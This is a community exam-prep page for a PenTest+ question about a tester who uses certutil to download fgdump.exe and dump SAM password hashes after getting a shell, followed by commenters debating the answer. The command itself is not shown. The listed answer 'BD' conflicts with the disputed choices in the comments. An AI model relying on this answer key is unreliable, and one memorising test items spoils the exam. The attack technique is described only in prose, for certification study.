PT0-002 Exam QuestionsBrowse all questions from this exam
Go to Exam

PT0-002 Exam - Question 325

A penetration tester issues the following command after obtaining a shell:

Which of the following describes this technique?

Show Answer
Correct Answer: BD

The command shown uses 'certutil' to download 'fgdump.exe' from a remote server to the local machine. 'fgdump.exe' is a known tool used for dumping password hashes from the Security Accounts Manager (SAM) database on Windows systems, which is a common step in privilege escalation. The act of downloading and running 'fgdump.exe' is specifically associated with attempting to obtain higher privileges by cracking these hashes, making this technique one of privilege escalation.

Discussion

4 comments
Sign in to comment
Obiwan123Option: D
Mar 19, 2024

Yeti87 is wrong

yeti87Option: B
Mar 12, 2024

This command downloads the fgdump.exe tool from the specified URL and saves it locally as fgdump.exe. fgdump.exe is a popular tool used for privilege escalation on Windows systems. It is often used to dump password hashes from the SAM (Security Accounts Manager) database, which can then be cracked offline to obtain plaintext passwords. Therefore, this technique is associated with privilege escalation as it aims to obtain sensitive information (password hashes) that could potentially lead to escalated privileges within the system.

MalikMakOption: D
Mar 26, 2024

Living-off-the-land (LotL) techniques involve the use of native tools available on the system to conduct operations typically performed by attackers. This can include moving laterally through a network, executing files, or exfiltrating data, all while potentially evading detection.

FasterN8Option: B
Jul 15, 2024

certutil is native, but fgdump is not. This is trying to crack passwords to get more privileges.